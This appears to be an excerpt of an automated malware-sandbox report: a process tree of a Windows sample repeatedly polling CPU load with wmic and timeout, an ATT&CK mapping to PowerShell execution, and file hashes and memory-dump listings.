C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2556

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4132

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4800

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1756

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4732

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4376

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3524

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3268

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4016

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3540

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4292

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1816

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:228

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2440

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:964

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:544

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:208

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3016

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5108

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:816

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:5068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1472

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1992

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1596

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2972

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1864

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3780

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4868

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2460

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h02piqtl.4ai.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1392-0-0x00007FFB552B3000-0x00007FFB552B5000-memory.dmp

Filesize
8KB

Download
memory/1392-10-0x0000029ACCED0000-0x0000029ACCEF2000-memory.dmp

Filesize
136KB

Download
memory/1392-11-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp

Filesize
10.8MB

Download
memory/1392-12-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp

Filesize
10.8MB

Download
memory/1392-13-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp

Filesize
10.8MB

Download
memory/1392-17-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp

Filesize
10.8MB

Download
memory/1392-16-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp

Filesize
10.8MB

Download